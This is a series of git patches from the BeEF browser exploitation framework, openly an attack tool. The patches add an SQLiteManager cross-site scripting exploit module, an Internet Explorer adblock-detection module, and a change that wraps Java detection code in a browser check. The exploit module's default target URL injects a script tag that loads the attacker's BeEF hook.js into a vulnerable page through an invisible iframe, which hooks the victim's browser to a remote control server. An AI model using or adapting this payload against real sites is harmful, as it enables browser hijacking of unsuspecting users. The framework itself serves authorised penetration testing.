--- a/modules/chrome_extensions/get_chrome_extensions/config.yaml
+++ /dev/null
@@ -1,16 +0,0 @@
-#
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
-# See the file 'doc/COPYING' for copying permission
-#
-beef:
-    module:
-        detect_chrome_extensions:
-            enable: true
-            category: "Chrome Extensions"
-            name: "Get Chrome Extensions"
-            description: "This module detects if any of the top 1,000 Chrome extensions are installed."
-            authors: ["koto", "bcoles"]
-            target:
-                working: ["C"]
-                not_working: ["All"]

From e275e4001cbd3b8a73774b828e45217bc00b5a9c Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Mon, 7 Jan 2013 12:30:24 +1030
Subject: [PATCH 145/397] Add SQLiteManager XSS module

---
 modules/exploits/sqlitemanager_xss/command.js | 17 ++++++++++++++
 .../exploits/sqlitemanager_xss/config.yaml    | 15 ++++++++++++
 modules/exploits/sqlitemanager_xss/module.rb  | 23 +++++++++++++++++++
 3 files changed, 55 insertions(+)
 create mode 100644 modules/exploits/sqlitemanager_xss/command.js
 create mode 100644 modules/exploits/sqlitemanager_xss/config.yaml
 create mode 100644 modules/exploits/sqlitemanager_xss/module.rb

diff --git a/modules/exploits/sqlitemanager_xss/command.js b/modules/exploits/sqlitemanager_xss/command.js
new file mode 100644
index 000000000..c919b9bb6
--- /dev/null
+++ b/modules/exploits/sqlitemanager_xss/command.js
@@ -0,0 +1,17 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var uri = '<%= @uri.gsub(/'/, "\\'") %>'; 
+
+	var serendipity_iframe = beef.dom.createInvisibleIframe();
+	serendipity_iframe.setAttribute('src', uri);
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+});
+
diff --git a/modules/exploits/sqlitemanager_xss/config.yaml b/modules/exploits/sqlitemanager_xss/config.yaml
new file mode 100644
index 000000000..c1cb0a5a8
--- /dev/null
+++ b/modules/exploits/sqlitemanager_xss/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        sqlitemanager_xss:
+            enable: true
+            category: ["Exploits", "XSS"]
+            name: "SQLiteManager XSS"
+            description: "Attempts to hook SQLiteManager using XSS.<br/>Tested on version 1.2.4 however other versions are likely to be vulnerable."
+            authors: ["bcoles"]
+            target:
+                unknown: ["ALL"]
diff --git a/modules/exploits/sqlitemanager_xss/module.rb b/modules/exploits/sqlitemanager_xss/module.rb
new file mode 100644
index 000000000..970693e67
--- /dev/null
+++ b/modules/exploits/sqlitemanager_xss/module.rb
@@ -0,0 +1,23 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Sqlitemanager_xss < BeEF::Core::Command
+
+	def self.options
+
+		configuration = BeEF::Core::Configuration.instance
+		hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js"
+
+		return [
+			{'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://127.0.0.1/sqlite/index.php?dbsel=1"><script src="'+hook_uri+'"></script><p+"'}
+		]
+
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

From 6c16a89328f96e23fa248043dfa242d0fc31ae58 Mon Sep 17 00:00:00 2001
From: root <root@bt.foo.org>
Date: Mon, 7 Jan 2013 01:30:44 -0500
Subject: [PATCH 146/397] Added simple adblock checks for IE from issue #803

---
 .../browser/detect_simple_adblock/command.js  | 40 +++++++++++++++++++
 .../browser/detect_simple_adblock/config.yaml | 16 ++++++++
 .../browser/detect_simple_adblock/module.rb   | 14 +++++++
 3 files changed, 70 insertions(+)
 create mode 100644 modules/browser/detect_simple_adblock/command.js
 create mode 100644 modules/browser/detect_simple_adblock/config.yaml
 create mode 100644 modules/browser/detect_simple_adblock/module.rb

diff --git a/modules/browser/detect_simple_adblock/command.js b/modules/browser/detect_simple_adblock/command.js
new file mode 100644
index 000000000..afcc4a672
--- /dev/null
+++ b/modules/browser/detect_simple_adblock/command.js
@@ -0,0 +1,40 @@
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	if (document.getElementById('adblock_img')) {
+		return "Img already created";
+	}
+
+	var img = new Image();
+	img.setAttribute("style","visibility:hidden");
+	img.setAttribute("width","0");
+	img.setAttribute("height","0");
+	img.src = 'http://simple-adblock.com/adblocktest/files/adbanner.gif';
+	img.id = 'adblock_img';
+	img.setAttribute("attr","start");
+	img.onerror = function() {
+		this.setAttribute("attr","error");
+	};
+	img.onload = function() {
+		this.setAttribute("attr","load");
+	};
+
+	document.body.appendChild(img);
+
+	setTimeout(function() {
+		var img = document.getElementById('adblock_img');	
+		if (img.getAttribute("attr") == "error") {
+			beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Adblock returned an error');
+		} else if (img.getAttribute("attr") == "load") {
+			beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Adblock is disabled or not installed');
+		} else if (img.getAttribute("attr") == "start") {
+			beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Adblock is enabled');
+		};
+		document.body.removeChild(img);
+		}, 10000);
+
+});
diff --git a/modules/browser/detect_simple_adblock/config.yaml b/modules/browser/detect_simple_adblock/config.yaml
new file mode 100644
index 000000000..b0ac675ba
--- /dev/null
+++ b/modules/browser/detect_simple_adblock/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_simple_adblock:
+            enable: true
+            category: "Browser"
+            name: "Detect Simple Adblock"
+            description: "This module checks if the Simple Adblock module is active."
+            authors: ["sussurro"]
+            target:
+                 working: ["IE"]
+                 not_working: ["All"]
diff --git a/modules/browser/detect_simple_adblock/module.rb b/modules/browser/detect_simple_adblock/module.rb
new file mode 100644
index 000000000..83b626b3e
--- /dev/null
+++ b/modules/browser/detect_simple_adblock/module.rb
@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_simple_adblock< BeEF::Core::Command
+
+	def post_execute 
+		content = {}
+		content['simple_adblock'] = @datastore['simple_adblock'] if not @datastore['simple_adblock'].nil?
+		save content
+	end
+
+end

From 5d9821aa741e874c6831d3e573804d6fcf4e5eb0 Mon Sep 17 00:00:00 2001
From: Saafan <a.m.saafan@gmail.com>
Date: Wed, 9 Jan 2013 00:47:45 +0200
Subject: [PATCH 147/397] Temporary workaround to fix IE not being hooked due
 to java detection code.

---
 core/main/client/browser.js | 24 ++++++++++++++++--------
 1 file changed, 16 insertions(+), 8 deletions(-)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index 696601bd4..6e74ed44a 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -650,16 +650,24 @@ beef.browser = {
 	 */
 	javaEnabled: function() {
 
-        // Cross-browser Java Deployment Toolkit Script
-        // Source: http://java.com/js/deployJava.js
-        var deployJava=function(){var l={core:["id","class","title","style"],i18n:["lang","dir"],events:["onclick","ondblclick","onmousedown","onmouseup","onmouseover","onmousemove","onmouseout","onkeypress","onkeydown","onkeyup"],applet:["codebase","code","name","archive","object","width","height","alt","align","hspace","vspace"],object:["classid","codebase","codetype","data","type","archive","declare","standby","height","width","usemap","name","tabindex","align","border","hspace","vspace"]};var b=l.object.concat(l.core,l.i18n,l.events);var m=l.applet.concat(l.core);function g(n){if(!d.debug){return}if(console.log){console.log(n)}else{alert(n)}}function k(o,n){if(o==null||o.length==0){return true}var q=o.charAt(o.length-1);if(q!="+"&&q!="*"&&(o.indexOf("_")!=-1&&q!="_")){o=o+"*";q="*"}o=o.substring(0,o.length-1);if(o.length>0){var p=o.charAt(o.length-1);if(p=="."||p=="_"){o=o.substring(0,o.length-1)}}if(q=="*"){return(n.indexOf(o)==0)}else{if(q=="+"){return o<=n}}return false}function e(){var n="//java.com/js/webstart.png";try{return document.location.protocol.indexOf("http")!=-1?n:"http:"+n}catch(o){return"http:"+n}}function j(p,o){var n=p.length;for(var q=0;q<n;q++){if(p[q]===o){return true}}return false}function c(n){return j(m,n.toLowerCase())}function i(n){return j(b,n.toLowerCase())}function a(n){if("MSIE"!=deployJava.browserName){return true}if(deployJava.compareVersionToPattern(deployJava.getPlugin().version,["10","0","0"],false,true)){return true}if(n==null){return false}return !k("1.6.0_33+",n)}var d={debug:null,version:"20120801",firefoxJavaVersion:null,myInterval:null,preInstallJREList:null,returnPage:null,brand:null,locale:null,installType:null,EAInstallEnabled:false,EarlyAccessURL:null,getJavaURL:"http://jdl.sun.com/webapps/getjava/BrowserRedirect?host=java.com",oldMimeType:"application/npruntime-scriptable-plugin;DeploymentToolkit",mimeType:"application/java-deployment-toolkit",launchButtonPNG:e(),browserName:null,browserName2:null,getJREs:function(){var r=new Array();if(this.isPluginInstalled()){var q=this.getPlugin();var n=q.jvms;for(var p=0;p<n.getLength();p++){r[p]=n.get(p).version}}else{var o=this.getBrowser();if(o=="MSIE"){if(this.testUsingActiveX("1.7.0")){r[0]="1.7.0"}else{if(this.testUsingActiveX("1.6.0")){r[0]="1.6.0"}else{if(this.testUsingActiveX("1.5.0")){r[0]="1.5.0"}else{if(this.testUsingActiveX("1.4.2")){r[0]="1.4.2"}else{if(this.testForMSVM()){r[0]="1.1"}}}}}}else{if(o=="Netscape Family"){this.getJPIVersionUsingMimeType();if(this.firefoxJavaVersion!=null){r[0]=this.firefoxJavaVersion}else{if(this.testUsingMimeTypes("1.7")){r[0]="1.7.0"}else{if(this.testUsingMimeTypes("1.6")){r[0]="1.6.0"}else{if(this.testUsingMimeTypes("1.5")){r[0]="1.5.0"}else{if(this.testUsingMimeTypes("1.4.2")){r[0]="1.4.2"}else{if(this.browserName2=="Safari"){if(this.testUsingPluginsArray("1.7.0")){r[0]="1.7.0"}else{if(this.testUsingPluginsArray("1.6")){r[0]="1.6.0"}else{if(this.testUsingPluginsArray("1.5")){r[0]="1.5.0"}else{if(this.testUsingPluginsArray("1.4.2")){r[0]="1.4.2"}}}}}}}}}}}}}if(this.debug){for(var p=0;p<r.length;++p){g("[getJREs()] We claim to have detected Java SE "+r[p])}}return r},installJRE:function(q,o){var n=false;if(this.isPluginInstalled()&&this.isAutoInstallEnabled(q)){var p=false;if(this.isCallbackSupported()){p=this.getPlugin().installJRE(q,o)}else{p=this.getPlugin().installJRE(q)}if(p){this.refresh();if(this.returnPage!=null){document.location=this.returnPage}}return p}else{return this.installLatestJRE()}},isAutoInstallEnabled:function(n){if(!this.isPluginInstalled()){return false}if(typeof n=="undefined"){n=null}return a(n)},isCallbackSupported:function(){return this.isPluginInstalled()&&this.compareVersionToPattern(this.getPlugin().version,["10","2","0"],false,true)},installLatestJRE:function(p){if(this.isPluginInstalled()&&this.isAutoInstallEnabled()){var q=false;if(this.isCallbackSupported()){q=this.getPlugin().installLatestJRE(p)}else{q=this.getPlugin().installLatestJRE()}if(q){this.refresh();if(this.returnPage!=null){document.location=this.returnPage}}return q}else{var o=this.getBrowser();var n=navigator.platform.toLowerCase();if((this.EAInstallEnabled=="true")&&(n.indexOf("win")!=-1)&&(this.EarlyAccessURL!=null)){this.preInstallJREList=this.getJREs();if(this.returnPage!=null){this.myInterval=setInterval("deployJava.poll()",3000)}location.href=this.EarlyAccessURL;return false}else{if(o=="MSIE"){return this.IEInstall()}else{if((o=="Netscape Family")&&(n.indexOf("win32")!=-1)){return this.FFInstall()}else{location.href=this.getJavaURL+((this.returnPage!=null)?("&returnPage="+this.returnPage):"")+((this.locale!=null)?("&locale="+this.locale):"")+((this.brand!=null)?("&brand="+this.brand):"")}}return false}}},runApplet:function(o,t,q){if(q=="undefined"||q==null){q="1.1"}var r="^(\\d+)(?:\\.(\\d+)(?:\\.(\\d+)(?:_(\\d+))?)?)?$";var n=q.match(r);if(this.returnPage==null){this.returnPage=document.location}if(n!=null){var p=this.getBrowser();if(p!="?"){if(this.versionCheck(q+"+")){this.writeAppletTag(o,t)}else{if(this.installJRE(q+"+")){this.refresh();location.href=document.location;this.writeAppletTag(o,t)}}}else{this.writeAppletTag(o,t)}}else{g("[runApplet()] Invalid minimumVersion argument to runApplet():"+q)}},writeAppletTag:function(q,v){var n="<applet ";var p="";var r="</applet>";var w=true;if(null==v||typeof v!="object"){v=new Object()}for(var o in q){if(!c(o)){v[o]=q[o]}else{n+=(" "+o+'="'+q[o]+'"');if(o=="code"){w=false}}}var u=false;for(var t in v){if(t=="codebase_lookup"){u=true}if(t=="object"||t=="java_object"||t=="java_code"){w=false}p+='<param name="'+t+'" value="'+v[t]+'"/>'}if(!u){p+='<param name="codebase_lookup" value="false"/>'}if(w){n+=(' code="dummy"')}n+=">";document.write(n+"\n"+p+"\n"+r)},versionCheck:function(o){var u=0;var w="^(\\d+)(?:\\.(\\d+)(?:\\.(\\d+)(?:_(\\d+))?)?)?(\\*|\\+)?$";var x=o.match(w);if(x!=null){var q=false;var t=false;var p=new Array();for(var r=1;r<x.length;++r){if((typeof x[r]=="string")&&(x[r]!="")){p[u]=x[r];u++}}if(p[p.length-1]=="+"){t=true;q=false;p.length--}else{if(p[p.length-1]=="*"){t=false;q=true;p.length--}else{if(p.length<4){t=false;q=true}}}var v=this.getJREs();for(var r=0;r<v.length;++r){if(this.compareVersionToPattern(v[r],p,q,t)){return true}}return false}else{var n="Invalid versionPattern passed to versionCheck: "+o;g("[versionCheck()] "+n);alert(n);return false}},isWebStartInstalled:function(q){var p=this.getBrowser();if(p=="?"){return true}if(q=="undefined"||q==null){q="1.4.2"}var o=false;var r="^(\\d+)(?:\\.(\\d+)(?:\\.(\\d+)(?:_(\\d+))?)?)?$";var n=q.match(r);if(n!=null){o=this.versionCheck(q+"+")}else{g("[isWebStartInstaller()] Invalid minimumVersion argument to isWebStartInstalled(): "+q);o=this.versionCheck("1.4.2+")}return o},getJPIVersionUsingMimeType:function(){for(var o=0;o<navigator.mimeTypes.length;++o){var p=navigator.mimeTypes[o].type;var n=p.match(/^application\/x-java-applet;jpi-version=(.*)$/);if(n!=null){this.firefoxJavaVersion=n[1];if("Opera"!=this.browserName2){break}}}},launchWebStartApplication:function(q){var n=navigator.userAgent.toLowerCase();this.getJPIVersionUsingMimeType();if(this.isWebStartInstalled("1.7.0")==false){if((this.installJRE("1.7.0+")==false)||((this.isWebStartInstalled("1.7.0")==false))){return false}}var t=null;if(document.documentURI){t=document.documentURI}if(t==null){t=document.URL}var o=this.getBrowser();var p;if(o=="MSIE"){p='<object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" width="0" height="0"><PARAM name="launchjnlp" value="'+q+'"><PARAM name="docbase" value="'+t+'"></object>'}else{if(o=="Netscape Family"){p='<embed type="application/x-java-applet;jpi-version='+this.firefoxJavaVersion+'" width="0" height="0" launchjnlp="'+q+'"docbase="'+t+'" />'}}if(document.body=="undefined"||document.body==null){document.write(p);document.location=t}else{var r=document.createElement("div");r.id="div1";r.style.position="relative";r.style.left="-10000px";r.style.margin="0px auto";r.className="dynamicDiv";r.innerHTML=p;document.body.appendChild(r)}},createWebStartLaunchButtonEx:function(p,o){if(this.returnPage==null){this.returnPage=p}var n="javascript:deployJava.launchWebStartApplication('"+p+"');";document.write('<a href="'+n+'" onMouseOver="window.status=\'\'; return true;"><img src="'+this.launchButtonPNG+'" border="0" /></a>')},createWebStartLaunchButton:function(p,o){if(this.returnPage==null){this.returnPage=p}var n="javascript:if (!deployJava.isWebStartInstalled(&quot;"+o+"&quot;)) {if (deployJava.installLatestJRE()) {if (deployJava.launch(&quot;"+p+"&quot;)) {}}} else {if (deployJava.launch(&quot;"+p+"&quot;)) {}}";document.write('<a href="'+n+'" onMouseOver="window.status=\'\'; return true;"><img src="'+this.launchButtonPNG+'" border="0" /></a>')},launch:function(n){document.location=n;return true},isPluginInstalled:function(){var n=this.getPlugin();if(n&&n.jvms){return true}else{return false}},isAutoUpdateEnabled:function(){if(this.isPluginInstalled()){return this.getPlugin().isAutoUpdateEnabled()}return false},setAutoUpdateEnabled:function(){if(this.isPluginInstalled()){return this.getPlugin().setAutoUpdateEnabled()}return false},setInstallerType:function(n){this.installType=n;if(this.isPluginInstalled()){return this.getPlugin().setInstallerType(n)}return false},setAdditionalPackages:function(n){if(this.isPluginInstalled()){return this.getPlugin().setAdditionalPackages(n)}return false},setEarlyAccess:function(n){this.EAInstallEnabled=n},isPlugin2:function(){if(this.isPluginInstalled()){if(this.versionCheck("1.6.0_10+")){try{return this.getPlugin().isPlugin2()}catch(n){}}}return false},allowPlugin:function(){this.getBrowser();var n=("Safari"!=this.browserName2&&"Opera"!=this.browserName2);return n},getPlugin:function(){this.refresh();var n=null;if(this.allowPlugin()){n=document.getElementById("deployJavaPlugin")}return n},compareVersionToPattern:function(u,o,q,r){if(u==undefined||o==undefined){return false}var v="^(\\d+)(?:\\.(\\d+)(?:\\.(\\d+)(?:_(\\d+))?)?)?$";var w=u.match(v);if(w!=null){var t=0;var x=new Array();for(var p=1;p<w.length;++p){if((typeof w[p]=="string")&&(w[p]!="")){x[t]=w[p];t++}}var n=Math.min(x.length,o.length);if(r){for(var p=0;p<n;++p){if(x[p]<o[p]){return false}else{if(x[p]>o[p]){return true}}}return true}else{for(var p=0;p<n;++p){if(x[p]!=o[p]){return false}}if(q){return true}else{return(x.length==o.length)}}}else{return false}},getBrowser:function(){if(this.browserName==null){var n=navigator.userAgent.toLowerCase();g("[getBrowser()] navigator.userAgent.toLowerCase() -> "+n);if((n.indexOf("msie")!=-1)&&(n.indexOf("opera")==-1)){this.browserName="MSIE";this.browserName2="MSIE"}else{if(n.indexOf("iphone")!=-1){this.browserName="Netscape Family";this.browserName2="iPhone"}else{if((n.indexOf("firefox")!=-1)&&(n.indexOf("opera")==-1)){this.browserName="Netscape Family";this.browserName2="Firefox"}else{if(n.indexOf("chrome")!=-1){this.browserName="Netscape Family";this.browserName2="Chrome"}else{if(n.indexOf("safari")!=-1){this.browserName="Netscape Family";this.browserName2="Safari"}else{if((n.indexOf("mozilla")!=-1)&&(n.indexOf("opera")==-1)){this.browserName="Netscape Family";this.browserName2="Other"}else{if(n.indexOf("opera")!=-1){this.browserName="Netscape Family";this.browserName2="Opera"}else{this.browserName="?";this.browserName2="unknown"}}}}}}}g("[getBrowser()] Detected browser name:"+this.browserName+", "+this.browserName2)}return this.browserName},testUsingActiveX:function(n){var p="JavaWebStart.isInstalled."+n+".0";if(typeof ActiveXObject=="undefined"||!ActiveXObject){g("[testUsingActiveX()] Browser claims to be IE, but no ActiveXObject object?");return false}try{return(new ActiveXObject(p)!=null)}catch(o){return false}},testForMSVM:function(){var o="{08B0E5C0-4FCB-11CF-AAA5-00401C608500}";if(typeof oClientCaps!="undefined"){var n=oClientCaps.getComponentVersion(o,"ComponentID");if((n=="")||(n=="5,0,5000,0")){return false}else{return true}}else{return false}},testUsingMimeTypes:function(o){if(!navigator.mimeTypes){g("[testUsingMimeTypes()] Browser claims to be Netscape family, but no mimeTypes[] array?");return false}for(var p=0;p<navigator.mimeTypes.length;++p){s=navigator.mimeTypes[p].type;var n=s.match(/^application\/x-java-applet\x3Bversion=(1\.8|1\.7|1\.6|1\.5|1\.4\.2)$/);if(n!=null){if(this.compareVersions(n[1],o)){return true}}}return false},testUsingPluginsArray:function(o){if((!navigator.plugins)||(!navigator.plugins.length)){return false}var n=navigator.platform.toLowerCase();for(var p=0;p<navigator.plugins.length;++p){s=navigator.plugins[p].description;if(s.search(/^Java Switchable Plug-in (Cocoa)/)!=-1){if(this.compareVersions("1.5.0",o)){return true}}else{if(s.search(/^Java/)!=-1){if(n.indexOf("win")!=-1){if(this.compareVersions("1.5.0",o)||this.compareVersions("1.6.0",o)){return true}}}}}if(this.compareVersions("1.5.0",o)){return true}return false},IEInstall:function(){location.href=this.getJavaURL+((this.returnPage!=null)?("&returnPage="+this.returnPage):"")+((this.locale!=null)?("&locale="+this.locale):"")+((this.brand!=null)?("&brand="+this.brand):"");return false},done:function(o,n){},FFInstall:function(){location.href=this.getJavaURL+((this.returnPage!=null)?("&returnPage="+this.returnPage):"")+((this.locale!=null)?("&locale="+this.locale):"")+((this.brand!=null)?("&brand="+this.brand):"")+((this.installType!=null)?("&type="+this.installType):"");return false},compareVersions:function(q,r){var o=q.split(".");var n=r.split(".");for(var p=0;p<o.length;++p){o[p]=Number(o[p])}for(var p=0;p<n.length;++p){n[p]=Number(n[p])}if(o.length==2){o[2]=0}if(o[0]>n[0]){return true}if(o[0]<n[0]){return false}if(o[1]>n[1]){return true}if(o[1]<n[1]){return false}if(o[2]>n[2]){return true}if(o[2]<n[2]){return false}return true},enableAlerts:function(){this.browserName=null;this.debug=true},poll:function(){this.refresh();var n=this.getJREs();if((this.preInstallJREList.length==0)&&(n.length!=0)){clearInterval(this.myInterval);if(this.returnPage!=null){location.href=this.returnPage}}if((this.preInstallJREList.length!=0)&&(n.length!=0)&&(this.preInstallJREList[0]!=n[0])){clearInterval(this.myInterval);if(this.returnPage!=null){location.href=this.returnPage}}},writePluginTag:function(){var n=this.getBrowser();if(n=="MSIE"){document.write('<object classid="clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA" id="deployJavaPlugin" width="0" height="0"></object>')}else{if(n=="Netscape Family"&&this.allowPlugin()){this.writeEmbedTag()}}},refresh:function(){navigator.plugins.refresh(false);var n=this.getBrowser();if(n=="Netscape Family"&&this.allowPlugin()){var o=document.getElementById("deployJavaPlugin");if(o==null){this.writeEmbedTag()}}},writeEmbedTag:function(){var n=false;if(navigator.mimeTypes!=null){for(var o=0;o<navigator.mimeTypes.length;o++){if(navigator.mimeTypes[o].type==this.mimeType){if(navigator.mimeTypes[o].enabledPlugin){document.write('<embed id="deployJavaPlugin" type="'+this.mimeType+'" hidden="true" />');n=true}}}if(!n){for(var o=0;o<navigator.mimeTypes.length;o++){if(navigator.mimeTypes[o].type==this.oldMimeType){if(navigator.mimeTypes[o].enabledPlugin){document.write('<embed id="deployJavaPlugin" type="'+this.oldMimeType+'" hidden="true" />')}}}}}}};d.writePluginTag();if(d.locale==null){var h=null;if(h==null){try{h=navigator.userLanguage}catch(f){}}if(h==null){try{h=navigator.systemLanguage}catch(f){}}if(h==null){try{h=navigator.language}catch(f){}}if(h!=null){h.replace("-","_");d.locale=h}}return d}();
+        if(!this.isIE())
+        {
 
-        versionJRE = deployJava.getJREs();
+            // Cross-browser Java Deployment Toolkit Script
+            // Source: http://java.com/js/deployJava.js
+            deployJava=function(){var l={core:["id","class","title","style"],i18n:["lang","dir"],events:["onclick","ondblclick","onmousedown","onmouseup","onmouseover","onmousemove","onmouseout","onkeypress","onkeydown","onkeyup"],applet:["codebase","code","name","archive","object","width","height","alt","align","hspace","vspace"],object:["classid","codebase","codetype","data","type","archive","declare","standby","height","width","usemap","name","tabindex","align","border","hspace","vspace"]};var b=l.object.concat(l.core,l.i18n,l.events);var m=l.applet.concat(l.core);function g(n){if(!d.debug){return}if(console.log){console.log(n)}else{alert(n)}}function k(o,n){if(o==null||o.length==0){return true}var q=o.charAt(o.length-1);if(q!="+"&&q!="*"&&(o.indexOf("_")!=-1&&q!="_")){o=o+"*";q="*"}o=o.substring(0,o.length-1);if(o.length>0){var p=o.charAt(o.length-1);if(p=="."||p=="_"){o=o.substring(0,o.length-1)}}if(q=="*"){return(n.indexOf(o)==0)}else{if(q=="+"){return o<=n}}return false}function e(){var n="//java.com/js/webstart.png";try{return document.location.protocol.indexOf("http")!=-1?n:"http:"+n}catch(o){return"http:"+n}}function j(p,o){var n=p.length;for(var q=0;q<n;q++){if(p[q]===o){return true}}return false}function c(n){return j(m,n.toLowerCase())}function i(n){return j(b,n.toLowerCase())}function a(n){if("MSIE"!=deployJava.browserName){return true}if(deployJava.compareVersionToPattern(deployJava.getPlugin().version,["10","0","0"],false,true)){return true}if(n==null){return false}return !k("1.6.0_33+",n)}var d={debug:null,version:"20120801",firefoxJavaVersion:null,myInterval:null,preInstallJREList:null,returnPage:null,brand:null,locale:null,installType:null,EAInstallEnabled:false,EarlyAccessURL:null,getJavaURL:"http://jdl.sun.com/webapps/getjava/BrowserRedirect?host=java.com",oldMimeType:"application/npruntime-scriptable-plugin;DeploymentToolkit",mimeType:"application/java-deployment-toolkit",launchButtonPNG:e(),browserName:null,browserName2:null,getJREs:function(){var r=new Array();if(this.isPluginInstalled()){var q=this.getPlugin();var n=q.jvms;for(var p=0;p<n.getLength();p++){r[p]=n.get(p).version}}else{var o=this.getBrowser();if(o=="MSIE"){if(this.testUsingActiveX("1.7.0")){r[0]="1.7.0"}else{if(this.testUsingActiveX("1.6.0")){r[0]="1.6.0"}else{if(this.testUsingActiveX("1.5.0")){r[0]="1.5.0"}else{if(this.testUsingActiveX("1.4.2")){r[0]="1.4.2"}else{if(this.testForMSVM()){r[0]="1.1"}}}}}}else{if(o=="Netscape Family"){this.getJPIVersionUsingMimeType();if(this.firefoxJavaVersion!=null){r[0]=this.firefoxJavaVersion}else{if(this.testUsingMimeTypes("1.7")){r[0]="1.7.0"}else{if(this.testUsingMimeTypes("1.6")){r[0]="1.6.0"}else{if(this.testUsingMimeTypes("1.5")){r[0]="1.5.0"}else{if(this.testUsingMimeTypes("1.4.2")){r[0]="1.4.2"}else{if(this.browserName2=="Safari"){if(this.testUsingPluginsArray("1.7.0")){r[0]="1.7.0"}else{if(this.testUsingPluginsArray("1.6")){r[0]="1.6.0"}else{if(this.testUsingPluginsArray("1.5")){r[0]="1.5.0"}else{if(this.testUsingPluginsArray("1.4.2")){r[0]="1.4.2"}}}}}}}}}}}}}if(this.debug){for(var p=0;p<r.length;++p){g("[getJREs()] We claim to have detected Java SE "+r[p])}}return r},installJRE:function(q,o){var n=false;if(this.isPluginInstalled()&&this.isAutoInstallEnabled(q)){var p=false;if(this.isCallbackSupported()){p=this.getPlugin().installJRE(q,o)}else{p=this.getPlugin().installJRE(q)}if(p){this.refresh();if(this.returnPage!=null){document.location=this.returnPage}}return p}else{return this.installLatestJRE()}},isAutoInstallEnabled:function(n){if(!this.isPluginInstalled()){return false}if(typeof n=="undefined"){n=null}return a(n)},isCallbackSupported:function(){return this.isPluginInstalled()&&this.compareVersionToPattern(this.getPlugin().version,["10","2","0"],false,true)},installLatestJRE:function(p){if(this.isPluginInstalled()&&this.isAutoInstallEnabled()){var q=false;if(this.isCallbackSupported()){q=this.getPlugin().installLatestJRE(p)}else{q=this.getPlugin().installLatestJRE()}if(q){this.refresh();if(this.returnPage!=null){document.location=this.returnPage}}return q}else{var o=this.getBrowser();var n=navigator.platform.toLowerCase();if((this.EAInstallEnabled=="true")&&(n.indexOf("win")!=-1)&&(this.EarlyAccessURL!=null)){this.preInstallJREList=this.getJREs();if(this.returnPage!=null){this.myInterval=setInterval("deployJava.poll()",3000)}location.href=this.EarlyAccessURL;return false}else{if(o=="MSIE"){return this.IEInstall()}else{if((o=="Netscape Family")&&(n.indexOf("win32")!=-1)){return this.FFInstall()}else{location.href=this.getJavaURL+((this.returnPage!=null)?("&returnPage="+this.returnPage):"")+((this.locale!=null)?("&locale="+this.locale):"")+((this.brand!=null)?("&brand="+this.brand):"")}}return false}}},runApplet:function(o,t,q){if(q=="undefined"||q==null){q="1.1"}var r="^(\\d+)(?:\\.(\\d+)(?:\\.(\\d+)(?:_(\\d+))?)?)?$";var n=q.match(r);if(this.returnPage==null){this.returnPage=document.location}if(n!=null){var p=this.getBrowser();if(p!="?"){if(this.versionCheck(q+"+")){this.writeAppletTag(o,t)}else{if(this.installJRE(q+"+")){this.refresh();location.href=document.location;this.writeAppletTag(o,t)}}}else{this.writeAppletTag(o,t)}}else{g("[runApplet()] Invalid minimumVersion argument to runApplet():"+q)}},writeAppletTag:function(q,v){var n="<applet ";var p="";var r="</applet>";var w=true;if(null==v||typeof v!="object"){v=new Object()}for(var o in q){if(!c(o)){v[o]=q[o]}else{n+=(" "+o+'="'+q[o]+'"');if(o=="code"){w=false}}}var u=false;for(var t in v){if(t=="codebase_lookup"){u=true}if(t=="object"||t=="java_object"||t=="java_code"){w=false}p+='<param name="'+t+'" value="'+v[t]+'"/>'}if(!u){p+='<param name="codebase_lookup" value="false"/>'}if(w){n+=(' code="dummy"')}n+=">";document.write(n+"\n"+p+"\n"+r)},versionCheck:function(o){var u=0;var w="^(\\d+)(?:\\.(\\d+)(?:\\.(\\d+)(?:_(\\d+))?)?)?(\\*|\\+)?$";var x=o.match(w);if(x!=null){var q=false;var t=false;var p=new Array();for(var r=1;r<x.length;++r){if((typeof x[r]=="string")&&(x[r]!="")){p[u]=x[r];u++}}if(p[p.length-1]=="+"){t=true;q=false;p.length--}else{if(p[p.length-1]=="*"){t=false;q=true;p.length--}else{if(p.length<4){t=false;q=true}}}var v=this.getJREs();for(var r=0;r<v.length;++r){if(this.compareVersionToPattern(v[r],p,q,t)){return true}}return false}else{var n="Invalid versionPattern passed to versionCheck: "+o;g("[versionCheck()] "+n);alert(n);return false}},isWebStartInstalled:function(q){var p=this.getBrowser();if(p=="?"){return 